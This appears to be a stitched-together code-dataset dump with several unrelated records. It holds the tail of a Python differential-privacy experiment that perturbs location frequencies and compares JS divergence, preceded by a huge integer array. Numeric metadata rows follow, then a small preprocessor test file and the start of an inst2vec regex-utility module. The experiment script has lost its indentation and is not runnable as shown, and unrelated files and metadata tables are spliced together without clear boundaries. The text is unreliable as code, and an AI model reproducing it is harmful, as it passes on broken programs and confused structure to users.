0, 1, 4, 59, 34, 0, 0, 0, 1, 5, 0, 41, 6, 0, 0, 0, 4, 19, 0, 0, 0, 0, 0, 154, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 72, 150, 242, 212, 3, 0, 84, 9, 0, 0, 0, 0, 0, 0, 0, 102, 0, 0, 1, 0, 43, 0, 52, 598, 0, 422, 22, 111, 37, 7, 51, 9, 13, 5, 0, 0, 0, 2, 252, 197, 0, 0, 1164, 733, 0, 2, 787, 153, 8, 0, 1, 0, 28, 4, 0, 58, 32, 0, 0, 0, 5, 0, 0, 0, 52, 0, 0, 0, 0, 22, 0, 0, 0, 0, 0, 148, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 585, 168, 171, 0, 0, 0, 0, 67, 0, 0, 0, 0, 0, 0, 0, 96, 0, 0, 44, 45, 125, 0, 60, 299, 307, 255, 0, 8, 0, 0, 19, 0, 0, 10, 14, 56, 218, 226, 7, 0, 0, 0, 39, 10, 0, 0, 18, 569, 558, 111, 2, 0, 79, 103, 89, 96, 47, 0, 0, 0, 6, 0, 0, 0, 
107, 26, 25, 28, 0, 24, 0, 0, 0, 0, 88, 79, 89, 74, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 53, 68, 41, 194, 0, 0, 0, 0, 0, 9, 55, 0, 0, 0, 0, 0, 0, 260, 72, 41, 36, 0, 0, 0, 105, 0, 484, 236, 0, 6, 0, 0, 23, 0, 0, 131, 159, 157, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 854, 457, 16, 112, 116, 98, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 78, 0, 0, 26, 0, 23, 0, 0, 0, 0, 147, 98, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 13, 57, 50, 0, 0, 0, 0, 0, 0, 0, 0, 8, 5, 59, 1, 0, 0, 1, 0, 152, 0, 0, 0, 0, 0, 0, 131, 0, 462, 156, 0, 11, 0, 0, 27, 56, 163, 23, 0, 0, 36, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20, 513, 0, 0, 0, 195, 70, 30, 0, 0, 0, 0, 10, 8, 0, 0, 12, 64, 0, 0, 27, 0, 20, 0, 0, 0, 0, 153, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 34, 38, 32, 40, 47, 30, 0, 19, 64, 35, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 3, 51, 1, 0, 11, 954, 679, 0, 0, 0, 0, 0, 0, 105, 177, 616, 343, 183, 180, 163, 164, 217, 130, 0, 0, 0, 0, 0, 56, 8, 0, 0, 0, 0, 0, 0, 0, 0, 28, 561, 0, 0, 0, 4, 0, 31, 81, 0, 0, 7, 5, 0, 0, 0, 56, 0, 0, 0, 29, 0, 22, 0, 0, 0, 0, 268, 969, 45, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 29, 0, 0, 0, 0, 0, 42, 53, 63, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 18, 17, 23, 21, 22, 351, 168, 69, 57, 54, 58, 53, 54, 107, 93, 402, 185, 0, 4, 0, 0, 44, 0, 0, 0, 0, 0, 0, 0, 44, 0, 0, 0, 0, 0, 0, 0, 748, 475, 134, 676, 0, 0, 3, 0, 0, 71, 27, 5, 3, 0, 0, 0, 7, 35, 0, 0, 0, 38, 0, 21, 0, 0, 0, 0, 527, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 30, 51, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 29, 0, 0, 0, 0, 0, 48, 0, 0, 0, 0, 0, 0, 76, 10, 414, 239, 46, 34, 0, 0, 30, 0, 0, 0, 0, 0, 0, 0, 73, 0, 0, 0, 0, 0, 0, 0, 29, 68, 76, 598, 0, 0, 4, 0, 0, 0, 24, 248, 10, 6, 0, 0, 72, 114, 0, 0, 0, 18, 78, 56, 38, 44, 40, 33, 462, 70, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 26, 74, 26, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 22, 1, 0, 0, 0, 0, 0, 65, 0, 0, 69, 92, 0, 0, 80, 0, 391, 128, 0, 31, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 51, 0, 0, 0, 0, 0, 13, 7, 50, 159, 2, 269, 
247, 4, 0, 0, 6, 19, 8, 87, 37, 4, 138, 109, 71, 115, 27, 55, 29, 0, 61, 24, 0, 0, 0, 0, 20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 37, 0, 0, 53, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 22, 0, 0, 0, 0, 0, 0, 42, 0, 0, 0, 23, 0, 0, 96, 1, 416, 168, 0, 25, 0, 0, 28, 0, 0, 0, 0, 0, 0, 0, 18, 0, 0, 10, 17, 12, 81, 39, 762, 36, 0, 0, 527, 4, 0, 18, 105, 0, 102, 66, 50, 84, 75, 0, 0, 0, 0, 0, 6, 19, 122, 60, 0, 1, 0, 0, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 33, 0, 61, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 22, 1, 0, 0, 0, 0, 1, 96, 67, 0, 0, 0, 0, 0, 2, 46, 0, 436, 122, 0, 26, 0, 0, 30, 0, 0, 0, 5, 19, 20, 19, 48, 7, 13, 8, 0, 76, 8, 0, 0, 0, 0, 0, 194, 277, 0, 0, 0, 0, 55, 3988, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 57, 0, 0, 0, 0, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 40, 53, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 13, 18, 0, 0, 0, 0, 0, 0, 0, 104, 0, 0, 0, 0, 0, 48, 3, 0, 457, 177, 0, 35, 0, 0, 34, 0, 0, 0, 26, 0, 0, 0, 14, 6, 20, 0, 0, 72, 0, 0, 0, 0, 0, 0, 220, 135, 199, 7, 0, 0, 43, 59, 0, 25, 19, 26, 33, 46, 3, 0, 1, 0, 0, 29, 22, 1, 0, 0, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 82, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 28, 0, 0, 0, 0, 0, 0, 0, 0, 41, 0, 0, 0, 0, 0, 38, 0, 0, 625, 112, 0, 28, 0, 0, 49, 51, 50, 49, 56, 27, 26, 28, 57, 20, 5, 31, 29, 0, 0, 0, 0, 0, 0, 0, 168, 59, 3, 353, 44, 1, 47, 12, 2, 191, 89, 51, 51, 154, 6, 31, 1, 0, 60, 19, 0, 18, 3, 0, 19, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 29, 52, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 30, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 30, 0, 108, 862, 88, 45, 217, 32, 16, 28, 17, 0, 0, 0, 0, 0, 0, 24, 0, 0, 1, 6, 33, 4, 1, 1, 2, 1, 2, 3, 206, 0, 164, 234, 356, 262, 209, 191, 410, 1209, 306, 278, 61, 30, 0, 15, 12, 70, 0, 0, 0, 20, 4, 20, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 23, 32, 4, 28, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 20, 0, 0, 0, 0, 0, 28, 0, 1097, 982, 0, 0, 5, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 9, 2, 1, 1, 0, 
0, 21, 60, 5, 0, 0, 0, 89, 151, 0, 0, 45, 32, 0, 0, 0, 316, 2044, 188, 78, 46, 0, 5, 5, 5, 74, 75, 5, 2, 1, 21, 36, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 46, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 38, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 0, 0, 0, 0, 0, 0, 1613, 279, 529, 1260, 2, 1, 20, 1, 1, 1, 1, 2, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 17, 24, 12, 5, 239, 65, 22, 55, 50, 26, 306, 271, 197, 240, 72, 7, 6, 5, 5, 0, 0, 0, 35, 59, 0, 25, 5, 3, 47, 6, 0, 0, 0, 0, 0, 0, 0, 43, 32, 0, 0, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 31, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 30, 0, 1, 1, 2, 1, 1, 38, 1, 444, 535, 0, 0, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 17, 365, 209, 86, 0, 106, 6, 11, 157, 91, 38, 0, 0, 0, 0, 0, 0, 0, 0, 0, 46, 57, 41, 37, 110, 46, 38, 17, 0, 0, 0, 0, 0, 26, 43, 5, 0, 0, 0, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 25, 5, 0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 19, 14, 1, 0, 0, 0, 0, 0, 30, 0, 444, 351, 4, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 10, 0, 0, 0, 0, 0, 0, 0, 16, 13, 97, 500, 389, 794, 788, 2300, 187, 62, 35, 0, 0, 0, 0, 0, 0, 0, 0, 0, 26, 21, 0, 0, 0, 58, 2, 3, 26, 0, 0, 0, 44, 23, 0, 0, 0, 0, 0, 4, 28, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 22, 13, 1, 1, 1, 0, 2, 0, 0, 0, 0, 0, 6, 26, 0, 0, 0, 0, 0, 0, 0, 27, 0, 396, 447, 581, 2, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 39, 0, 0, 0, 0, 14, 465, 696, 89, 80, 95, 34, 7, 4, 2, 0, 0, 0, 0, 0, 5, 0, 0, 6, 23, 48, 0, 0, 21, 7, 0, 46, 10, 0, 0, 0, 0, 0, 0, 0, 27, 1, 1, 1, 1, 1, 1, 1, 1, 1, 4, 16, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 33, 0, 0, 0, 0, 0, 0, 0, 0, 27, 0, 153, 140, 205, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 27, 2, 0, 0, 0, 0, 0, 0, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20, 31, 27, 24, 25, 26, 48, 27, 21, 26, 35, 51, 47, 0, 0, 0, 18, 0, 11, 0, 0, 1, 1, 1, 1, 1, 1, 41, 0, 0, 0, 0, 0, 0, 0, 0, 6, 19, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 29, 5, 0, 0, 0, 0, 0, 0, 0, 331, 106, 76, 217, 0, 448, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 
0, 0, 0, 0, 0, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 42, 0, 2, 4, 4, 5, 15, 61, 6, 1, 7, 0, 0, 0, 0, 0, 5, 37, 1, 1, 0, 0, 0, 0, 0, 0, 0, 6, 36, 0, 0, 0, 0, 0, 0, 17, 23, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 13, 17, 0, 0, 0, 0, 0, 0, 0, 0, 135, 28, 1, 263, 0, 75, 564, 694, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 0, 0, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 28, 3, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, 22, 0, 0, 0, 0, 0, 0, 29, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 41, 0, 0, 0, 0, 2, 26, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 0, 0, 0, 0, 0, 0, 0, 0, 0, 47, 28, 3, 1088, 56, 44, 71, 263, 99, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 0, 0, 0, 0, 0, 0, 0, 12, 10, 0, 0, 0, 0, 0, 0, 1, 28, 21, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 34, 32, 27, 28, 60, 36, 26, 32, 56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 26, 3, 15, 0, 0, 148, 92, 201, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 25, 0, 0, 0, 0, 0, 0, 0, 0, 17, 10, 0, 0, 0, 0, 27, 26, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 22, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 29, 3, 0, 0, 0, 40, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 26, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 73, 104, 22, 6, 456, 530, 14, 29, 7, 8, 7, 6, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 26, 0, 6, 29, 28, 2, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 33, 9, 9, 8, 66, 7, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 22, 7, 0, 0, 0, 0, 20, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 33, 0, 0, 0, 0, 0, 118, 178, 0, 0, 0, 0, 29, 0, 21, 0, 0, 297, 0, 0, 0, 0, 0, 0, 8, 28, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 57, 22, 0, 0, 4, 6, 6, 6, 5, 6, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 13, 0, 0, 0, 0, 0, 0, 29, 0, 0, 0, 0, 0, 0, 0, 0, 0, 66, 0, 0, 0, 0, 0, 0, 87, 0, 0, 0, 0, 29, 0, 12, 0, 0, 123, 135, 0, 0, 0, 0, 0, 0, 1, 7, 10, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 2, 4, 4, 0, 68, 7, 6, 7, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 16, 0, 0, 0, 0, 0, 0, 0, 56, 0, 0, 0, 0, 0, 0, 0, 0, 5, 39, 0, 0, 0, 0, 0, 0, 14, 105, 0, 0, 0, 30, 0, 7, 8, 0, 0, 237, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 58, 9, 31, 6, 5, 5, 5, 0, 5, 7, 6, 5, 14, 40, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 16, 0, 0, 0, 0, 0, 0, 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 35, 0, 0, 0, 0, 0, 0, 0, 50, 23, 56, 46, 0, 30, 0, 0, 39, 2, 0, 241, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 0, 74, 0, 0, 0, 1, 8, 4, 0, 0, 0, 0, 36, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 51, 0, 0, 0, 0, 0, 0, 0, 0, 28, 0, 0, 0, 0, 0, 0, 35, 11, 0, 19, 15, 0, 30, 0, 0, 0, 0, 0, 238, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 155, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 37, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 23, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 48, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 28, 46, 0, 0, 0, 0, 0, 8, 33, 0, 0, 0, 0, 231, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 113, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 36, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 55, 23, 29, 26, 28, 25, 27, 43, 33, 57, 0, 10, 36, 36, 33, 8, 0, 0, 0, 0, 0, 0, 0, 11, 28, 0, 0, 32, 204, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 283, 67, 4, 0, 0, 0, 0, 0, 0, 0, 0, 37, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 34, 40, 30, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 10, 30, 0, 83, 153, 6, 4, 4, 4, 4, 4, 4, 4, 3, 4, 1, 0, 269, 4, 2, 0, 0, 0, 0, 0, 0, 0, 0, 39, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 3, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 7, 31, 120, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 4, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 38, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 13, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 407, 0, 0, 0, 0, 3, 4, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 13, 0, 0, 0, 0, 0, 0, 0, 0, 62, 204, 4, 0, 0, 0, 674, 119, 0, 0, 0, 0, 0, 0, 4, 3, 2, 6, 2, 0, 0, 0, 0, 3, 8, 2, 27, 0, 0, 0, 0, 0, 0, 88, 126, 4, 4, 1, 46, 0, 0, 0, 0, 0, 9, 0, 0, 0, 0, 0]
perturbedFrequency_Laplace = [0 for i in range(dimension*dimension)]
perturbedFrequency_distPreserving = [0 for i in range(dimension*dimension)]
for i in range(len(frequency_1)):
oneDimensionLocation = i + 1
if oneDimensionLocation % 1 == 0:
print('进度: ' + str(oneDimensionLocation) + '/' + str(dimension * dimension))
if frequency_1[i] == 0:
continue
Epsilon_list = []
for epsilon_count in range(frequency_1[i]):
Epsilon = random.uniform(0.1, 1)
Epsilon_list.append(Epsilon)
reportedLocation_Laplace = perturbation_tool.perturbationOnOneLocation_userProportion(oneDimensionLocation,
frequency_1[i],
dimension,
Epsilon_list,proportion)
reportedLocation_distPreserving = perturbation_tool.perturbationOnOneLocation_patternPreserving_userProportion(
oneDimensionLocation,
frequency_1[i], dimension,
frequency_1, Epsilon_list,proportion)
for i in reportedLocation_Laplace:
perturbedFrequency_Laplace[i - 1] += 1
for i in reportedLocation_distPreserving:
perturbedFrequency_distPreserving[i - 1] += 1
perturbedFrequency_Laplace_numpy = np.array(perturbedFrequency_Laplace)
perturbedFrequency_distPreserving_numpy = np.array(perturbedFrequency_distPreserving)
sum_orgin = 0
sum_perturbed_Laplace = 0
sum_perturbed_distPreserving = 0
for i in range(len(frequency_1)):
sum_orgin += frequency_1[i]
sum_perturbed_Laplace += perturbedFrequency_Laplace[i]
sum_perturbed_distPreserving += perturbedFrequency_distPreserving[i]
if sum_orgin != sum_perturbed_Laplace:
print('Error 1')
elif sum_orgin != sum_perturbed_distPreserving:
print('Error 2')
formalized_orgin = []
formalized_perturbed_Laplace = []
formalized_perturbed_distPreserving = []
for i in range(len(frequency_1)):
formalized_orgin.append(frequency_1[i]/sum_orgin)
formalized_perturbed_Laplace.append(perturbedFrequency_Laplace[i]/sum_perturbed_Laplace)
formalized_perturbed_distPreserving.append(perturbedFrequency_distPreserving[i] / sum_perturbed_distPreserving)
frequency_orgin = np.array(formalized_orgin)
frequency_perturbed_Laplace = np.array(formalized_perturbed_Laplace)
frequency_perturbed_distPreserving = np.array(formalized_perturbed_distPreserving)
JS_Laplace.append(perturbation_tool.JS_divergence(formalized_orgin,formalized_perturbed_Laplace))
JS_distPreserving.append(perturbation_tool.JS_divergence(formalized_orgin,formalized_perturbed_distPreserving))
print("JS divergence")
JS_multiTimes_Laplace.append(JS_Laplace)
JS_multiTimes_distPreserving.append(JS_distPreserving)
mean_list = []
std_list = []
for k in range(len(proportion_list)):
column_list = []
for i in range(len(JS_multiTimes_Laplace)):
column_list.append(JS_multiTimes_Laplace[i][k])
column_numpyList = np.array(column_list)
column_mean = np.mean(column_numpyList)
column_std = np.std(column_numpyList,ddof=1)
mean_list.append(column_mean)
std_list.append(column_std)
print('Laplace下JS距离的均值,标准差:')
print(mean_list)
print(std_list)
mean_list = []
std_list = []
for k in range(len(proportion_list)):
column_list = []
for i in range(len(JS_multiTimes_distPreserving)):
column_list.append(JS_multiTimes_distPreserving[i][k])
column_numpyList = np.array(column_list)
column_mean = np.mean(column_numpyList)
column_std = np.std(column_numpyList,ddof=1)
mean_list.append(column_mean)
std_list.append(column_std)
print('distPreserving下JS距离的均值,标准差:')
print(mean_list)
print(std_list)
# Script entry point: run the perturbation/JS-divergence experiment only when
# executed directly (not when imported as a module).
if __name__ =='__main__':
    main ()
| 398.438095
| 36,535
| 0.472034
| 10,518
| 41,836
| 1.862141
| 0.135197
| 0.453691
| 0.557541
| 0.616563
| 0.384254
| 0.345757
| 0.310119
| 0.279639
| 0.259522
| 0.240069
| 0
| 0.550129
| 0.27952
| 41,836
| 105
| 36,536
| 398.438095
| 0.099662
| 0
| 0
| 0.242718
| 0
| 0
| 0.002492
| 0.000647
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009709
| false
| 0
| 0.067961
| 0
| 0.07767
| 0.116505
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e68def69dd31a669805627bd88111d7c2038fa74
| 514
|
py
|
Python
|
test/inputs/define_undef.py
|
zaxebo1/preprocess
|
7cce7848d50af5b8f068127dd67f482568d9648d
|
[
"MIT"
] | 21
|
2015-12-21T22:35:22.000Z
|
2022-02-18T03:07:55.000Z
|
test/inputs/define_undef.py
|
pombreda/preprocess
|
7cce7848d50af5b8f068127dd67f482568d9648d
|
[
"MIT"
] | 5
|
2015-09-11T15:03:03.000Z
|
2018-02-19T09:53:17.000Z
|
test/inputs/define_undef.py
|
pombreda/preprocess
|
7cce7848d50af5b8f068127dd67f482568d9648d
|
[
"MIT"
] | 10
|
2015-09-14T08:16:54.000Z
|
2022-02-18T03:08:09.000Z
|
#!python
# #define FOO_A
# #define FOO_B 0
# #define FOO_C 1
if __name__ == '__main__':
# #if FOO_A
print "a"
# #endif
# #if FOO_B
print "b"
# #endif
# #if defined("FOO_B")
print "b defined"
# #endif
# #if FOO_C
print "c"
# #endif
# #if defined("FOO_D")
print "d defined"
# #endif
# #undef FOO_B
# #undef FOO_D
# #if FOO_A
print "a"
# #endif
# #if defined("FOO_B")
print "b defined"
# #endif
# #if FOO_C
print "c"
# #endif
# #if defined("FOO_D")
print "d defined"
# #endif
| 12.85
| 26
| 0.577821
| 83
| 514
| 3.313253
| 0.192771
| 0.178182
| 0.203636
| 0.247273
| 0.723636
| 0.723636
| 0.723636
| 0.610909
| 0.610909
| 0.610909
| 0
| 0.005208
| 0.252918
| 514
| 39
| 27
| 13.179487
| 0.710938
| 0.492218
| 0
| 0.8
| 0
| 0
| 0.230047
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.9
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
e6b401f62c6d57634b0c0c55e579a2c276b23a1b
| 151,935
|
py
|
Python
|
utils/xfg_util/rgx_utils.py
|
fioushen/ParallelismPrediction
|
8324c0d7d99b960db968fa3c2382c27548643c81
|
[
"MIT"
] | null | null | null |
utils/xfg_util/rgx_utils.py
|
fioushen/ParallelismPrediction
|
8324c0d7d99b960db968fa3c2382c27548643c81
|
[
"MIT"
] | null | null | null |
utils/xfg_util/rgx_utils.py
|
fioushen/ParallelismPrediction
|
8324c0d7d99b960db968fa3c2382c27548643c81
|
[
"MIT"
] | 1
|
2020-07-03T10:25:42.000Z
|
2020-07-03T10:25:42.000Z
|
import re
import sys
import pickle
import datetime
max_bytes = 2**31 - 1
def onehot(n, dim):
    """Return a one-hot list of length ``dim`` with a 1 at index ``n``."""
    encoding = [0 for _ in range(dim)]
    encoding[n] = 1
    return encoding
def safe_pickle(data, file, chunk_size=None):
    """
    Pickle big files safely, processing them in chunks.

    :param data: data to be pickled
    :param file: file to pickle it into
    :param chunk_size: maximum bytes written per call (defaults to the
                       module-level ``max_bytes``); exposed mainly so the
                       chunking logic can be exercised with small payloads
    """
    if chunk_size is None:
        chunk_size = max_bytes
    pickle_out = pickle.dumps(data)
    # len() is the exact payload size; the previous sys.getsizeof() call
    # included the bytes-object header and over-counted (harmless only
    # because slicing clamps at the end of the buffer).
    n_bytes = len(pickle_out)
    with open(file, 'wb') as f:
        for i in range(0, n_bytes, chunk_size):
            # Slicing clamps automatically, so no min() is needed.
            f.write(pickle_out[i:i + chunk_size])
def set_file_signature(param, data_folder, set_from_date_time=False):
    """
    Set file signature to differentiate between embeddings trainings.

    :param param: parameters of the inst2vec training
    :param data_folder: string containing the path to the parent directory of raw data sub-folders
    :param set_from_date_time: set file signature according to time and date instead of parameters
    :return: file signature
    """
    if set_from_date_time:
        # Timestamp-based signature, minute resolution.
        signature = datetime.datetime.now().strftime("%Y-%m-%d--%H-%M")
    else:
        # Parameter-based signature: folder path (slashes flattened to
        # underscores) followed by the training hyper-parameters.
        pieces = [
            '_', re.sub(r'/', '_', data_folder),
            '_d-', str(param['embedding_size']),
            '_m-', str(param['mini_batch_size']),
            '_s-', str(param['num_sampled']),
            '_e-', str(param['learning_rate']),
            '_r-', str(param['beta']),
            '_cw-', str(param['context_width']),
            '_N-', str(param['num_epochs']),
        ]
        signature = ''.join(pieces)
    print("File signature: ", signature)
    return signature
########################################################################################################################
# Regex manipulation: helper functions
########################################################################################################################
def any_of(possibilities, to_add=''):
    """
    Helper function for regex manipulation:
    Construct a regex representing "any of" the given possibilities.

    :param possibilities: list of strings representing different word possibilities
    :param to_add: string appended AFTER each possibility, followed by a space
                   (optional; the previous docstring incorrectly said it was
                   added at the beginning)
    :return: string corresponding to a non-capturing regex group matching any
             of the given possibilities
    """
    assert len(possibilities) > 0
    if len(to_add) > 0:
        alternatives = [p + to_add + ' ' for p in possibilities]
    else:
        alternatives = list(possibilities)
    return '(?:' + '|'.join(alternatives) + ')'
########################################################################################################################
# Regex manipulation: helper variables
########################################################################################################################
# Identifiers
global_id = r'(?<!%")@["\w\d\.\-\_\$\\]+'
local_id_no_perc = '[\"\@\d\w\.\-\_\:]+'
